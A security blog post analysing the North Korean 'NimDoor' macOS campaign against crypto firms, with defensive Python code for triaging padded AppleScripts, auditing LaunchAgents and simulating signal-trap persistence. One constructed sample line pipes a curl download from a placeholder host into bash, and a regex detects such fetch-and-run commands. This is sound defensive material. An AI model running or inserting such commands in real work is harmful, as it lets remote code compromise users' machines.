North Korean Hackers Deploy macOS Malware to Target Crypto Firms

Alan V Gutnov

Director of Strategy

July 16, 2025 2 min read

North Korean Malware Campaign Targeting Crypto Firms

North Korean state-aligned hackers are running a campaign that uses custom macOS malware to infiltrate Web3 and cryptocurrency organizations. The tradecraft combines social engineering, deceptive AppleScripts and binaries compiled from Nim, a niche programming language rarely seen in macOS malware. Researchers at Sentinel Labs track the operation as "NimDoor".


Attack Vector and Initial Compromise

The intrusion starts with social engineering. Victims are contacted on Telegram by an account posing as a trusted contact, who asks to schedule a meeting via Calendly. They then receive a phishing email with a fake Zoom meeting invitation and instructions to run a purported "Zoom SDK update" script. That script, zoom_sdk_support.scpt, is padded with about 10,000 lines of white space so that anyone who opens it sees nothing of interest; below the padding, it fetches a second-stage payload from a remote server and executes it.
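A quick triage for a script like this, as an added example (not code from the reports or the campaign), looks for exactly the two traits described above: a file that is almost entirely blank lines, and a `do shell script` call that pipes a download straight into an interpreter. It assumes the AppleScript is available as text; a compiled `.scpt` must be decompiled first (`osadecompile file.scpt`). The sample script, its hostname and its command are constructed for the example.

```python
"""Triage a suspected dropper script for padding and fetch-and-run behaviour.

Added example for this article; not code from the reports or the campaign.
Assumes the AppleScript is available as text (for a compiled .scpt, run
`osadecompile file.scpt` first). The URL and commands below are constructed.
"""
import re

# Constructed sample: ~10,000 blank lines hide a one-line downloader at the end.
# The hostname is a placeholder, not an indicator from the campaign.
PADDED_DROPPER = ("\n" * 10000) + \
    'do shell script "curl -s https://sdk-update.example/zoom_sdk.sh | bash"\n'

# Constructed benign script for comparison.
BENIGN_SCRIPT = 'tell application "Finder"\n\tactivate\nend tell\n'

# Matches the string argument of every `do shell script "..."` call,
# honouring backslash-escaped quotes inside the string.
SHELL_CALL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)

# A downloader piped straight into a shell interpreter.
FETCH_AND_RUN = re.compile(r'\b(curl|wget)\b.*\|\s*(ba|z)?sh\b')


def triage_applescript(text, min_lines=500, min_blank_ratio=0.9):
    """Return padding statistics and any shell commands the script executes."""
    lines = text.splitlines()
    blank = sum(1 for line in lines if not line.strip())
    ratio = blank / len(lines) if lines else 0.0
    padded = len(lines) >= min_lines and ratio >= min_blank_ratio
    shell_calls = [m.group(1) for m in SHELL_CALL.finditer(text)]
    fetch_and_run = [c for c in shell_calls if FETCH_AND_RUN.search(c)]
    return {
        "total_lines": len(lines),
        "blank_lines": blank,
        "blank_ratio": round(ratio, 4),
        "padded": padded,
        "shell_calls": shell_calls,
        "fetch_and_run": fetch_and_run,
        # Padding alone is odd; padding plus a shell call, or any fetch-and-run,
        # is worth an analyst's attention.
        "suspicious": (padded and bool(shell_calls)) or bool(fetch_and_run),
    }


if __name__ == "__main__":
    for name, script in (("padded dropper", PADDED_DROPPER), ("benign", BENIGN_SCRIPT)):
        result = triage_applescript(script)
        print(f"{name}: padded={result['padded']} suspicious={result['suspicious']} "
              f"commands={result['shell_calls']}")
```

The thresholds are deliberately loose: a legitimate script never needs hundreds of consecutive blank lines, so any hit on `padded` deserves a look even when no shell call is extracted, since the regex only understands the `do shell script "..."` form and will miss commands assembled at runtime from string variables.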

Huntress researchers have documented these attacks and note that the malware persists on compromised systems through macOS LaunchAgents, which start it again after a reboot and allow it to reinstate itself after its process is terminated.
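LaunchAgent persistence leaves a plist on disk, which is the easiest place to hunt for it. The following is an added example, not code from the reports: it parses a LaunchAgent plist and flags the traits that matter (starts at login, is restarted by launchd when killed, points at a program outside the usual install locations or inside a hidden directory, or carries a vendor-looking label that does not match the program's location). Both plists are constructed, and the list of "trusted" path prefixes is an assumption to tune for your own fleet.

```python
"""Audit LaunchAgent plists for persistence traits.

Added example for this article; not code from the reports. The two plists
below are constructed, and the "trusted" path prefixes are an assumption you
should tune for your fleet.
"""
import os
import plistlib
import re

# Paths where a legitimately installed agent's program usually lives (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                    "/Applications/", "/Library/Apple/")
# Vendor names that malware labels tend to borrow.
VENDOR_WORDS = re.compile(r"\b(apple|google|zoom|microsoft|adobe)\b", re.IGNORECASE)

# Constructed sample: vendor-looking label, hidden directory, runs at login and
# is restarted whenever it exits.
SUSPECT_AGENT = plistlib.dumps({
    "Label": "com.apple.helper.update",
    "ProgramArguments": ["/Users/victim/Library/.cache/updater", "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

# Constructed benign agent for comparison.
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.backup-agent",
    "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/agent"],
    "RunAtLoad": True,
})


def audit_launch_agent(data):
    """Parse one plist (XML or binary) and return the traits worth a second look."""
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    label = plist.get("Label", "")
    findings = []
    if plist.get("RunAtLoad"):
        findings.append("RunAtLoad: starts at every login")
    keep = plist.get("KeepAlive")
    if keep is True or isinstance(keep, dict):
        findings.append("KeepAlive: launchd restarts it after exit or kill")
    if program and not program.startswith(TRUSTED_PREFIXES):
        findings.append(f"program outside trusted paths: {program}")
    if any(part.startswith(".") for part in program.split("/")):
        findings.append("program lives in a hidden directory")
    if VENDOR_WORDS.search(label) and not program.startswith(TRUSTED_PREFIXES):
        findings.append(f"label mimics a vendor but program is not in a vendor path: {label}")
    auto_start = any(f.startswith(("RunAtLoad", "KeepAlive")) for f in findings)
    odd_location = any(f.startswith(("program outside", "program lives")) for f in findings)
    return {"label": label, "program": program, "findings": findings,
            "suspicious": auto_start and odd_location}


def audit_directory(path):
    """Audit every .plist in a LaunchAgents directory; returns the suspicious ones."""
    hits = []
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            try:
                result = audit_launch_agent(fh.read())
            except plistlib.InvalidFileException:
                continue
        if result["suspicious"]:
            hits.append((name, result))
    return hits


if __name__ == "__main__":
    for name, data in (("suspect", SUSPECT_AGENT), ("benign", BENIGN_AGENT)):
        r = audit_launch_agent(data)
        print(f"{name}: suspicious={r['suspicious']}")
        for f in r["findings"]:
            print("   -", f)
    for d in (os.path.expanduser("~/Library/LaunchAgents"), "/Library/LaunchAgents"):
        if os.path.isdir(d):
            for name, r in audit_directory(d):
                print(f"{d}/{name}: {r['findings']}")
```

A program under `/Applications` is not trustworthy just because of its path; for anything flagged, check the binary's signature with `codesign -dv --verbose=4 <path>` and compare the plist against what `launchctl print gui/$(id -u)` reports as actually loaded, since a plist on disk and a running service can differ.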

Multi-Stage Infection Process

Once the initial script runs, it downloads two Mach-O binaries. The first, written in C++, writes an encrypted payload to disk; the second, compiled from Nim source, maintains access. The Nim component uses process injection, a technique rarely seen in macOS malware, and communicates with its command-and-control server over TLS-encrypted WebSockets (wss://), the same channel used to exfiltrate stolen data.


Data Exfiltration Techniques

Bash scripts then collect and exfiltrate sensitive user data, including Keychain credentials and browser data from Chrome, Firefox and Brave. The persistence components are given names that resemble legitimate system files, so they are easy to overlook in a directory listing.

In addition to data theft, the malware uses an unusual persistence mechanism: it installs signal handlers for SIGINT and SIGTERM, so an attempt to kill the process triggers the handler, which re-drops the persistence components before the process exits, and the LaunchAgent then starts it again. Only an uncatchable signal such as SIGKILL bypasses the handler, and the LaunchAgent must be removed before the kill or the implant is simply relaunched. Together with the choice of Nim, this reflects an evolution in North Korean tradecraft toward less common programming languages and techniques.
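The signal-handler trick is easy to misjudge during incident response, so here it is reproduced in a harmless form as an added example (not code from the reports): a stand-in "implant" process arms handlers for SIGINT and SIGTERM and, when asked to terminate, writes a marker file where real malware would re-write its LaunchAgent and binary. The parent sends each signal in turn and reports whether the marker appeared. The implant source, marker file name and timings are all constructed for the example.

```python
"""Show why SIGTERM does not stop an implant that traps signals, and why SIGKILL does.

Added example for this article; not code from the reports. The child process
below stands in for the implant: its handler writes a marker file (standing in
for re-dropped persistence components) whenever it is asked to terminate.
"""
import os
import signal
import subprocess
import sys
import tempfile

# Source of the stand-in implant, run as a separate Python process.
IMPLANT = r"""
import os, signal, sys, time
marker = sys.argv[1]

def reinstall(signum, frame):
    # Where real malware would re-write its LaunchAgent and binary,
    # this stand-in just records that the handler ran.
    with open(marker, "w") as fh:
        fh.write("persistence re-dropped on signal %d\n" % signum)
    os._exit(0)

signal.signal(signal.SIGINT, reinstall)
signal.signal(signal.SIGTERM, reinstall)
print("ready", flush=True)          # tell the parent the handlers are armed
while True:
    time.sleep(0.05)
"""


def terminate_with(sig):
    """Start the stand-in implant, send it `sig`, and report whether it re-persisted."""
    with tempfile.TemporaryDirectory() as workdir:
        marker = os.path.join(workdir, "launchagent.plist")  # constructed name
        child = subprocess.Popen([sys.executable, "-c", IMPLANT, marker],
                                 stdout=subprocess.PIPE, text=True)
        try:
            if child.stdout.readline().strip() != "ready":
                child.kill()
                raise RuntimeError("stand-in implant failed to start")
            child.send_signal(sig)       # only sent once the handlers are in place
            child.wait(timeout=10)
        finally:
            child.stdout.close()
        return os.path.exists(marker)


def compare_signals():
    """SIGTERM/SIGINT are caught and trigger re-persistence; SIGKILL cannot be caught."""
    return {
        "SIGTERM": terminate_with(signal.SIGTERM),
        "SIGINT": terminate_with(signal.SIGINT),
        "SIGKILL": terminate_with(signal.SIGKILL),
    }


if __name__ == "__main__":
    for name, persisted in compare_signals().items():
        print(f"{name}: persistence re-dropped = {persisted}")
```

The practical consequence for responders: a plain `kill <pid>` (SIGTERM) or Ctrl-C (SIGINT) is an invitation for the handler to run. Remove the LaunchAgent first (`launchctl bootout gui/$(id -u)/<label>`, or `launchctl unload` on older releases), then `kill -9 <pid>`, which the process cannot intercept, and only then delete the binary and plist; in the opposite order, the handler re-drops the files and a KeepAlive agent relaunches the implant. Capture memory and disk artifacts before any of that if forensics matter.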

Conclusion

The NimDoor campaign illustrates how North Korean APT groups keep adapting their tooling. Treat unsolicited meeting invitations and "update" scripts delivered through chat or email as hostile, even when they appear to come from a known contact; software such as Zoom updates itself and never asks the user to run a script. Keeping macOS patched and running reputable endpoint security tooling reduces the risk, but does not replace that habit, since the dropper here only runs because the victim executes it by hand.

For more detailed technical insights, refer to the full reports from Sentinel Labs and Huntress.
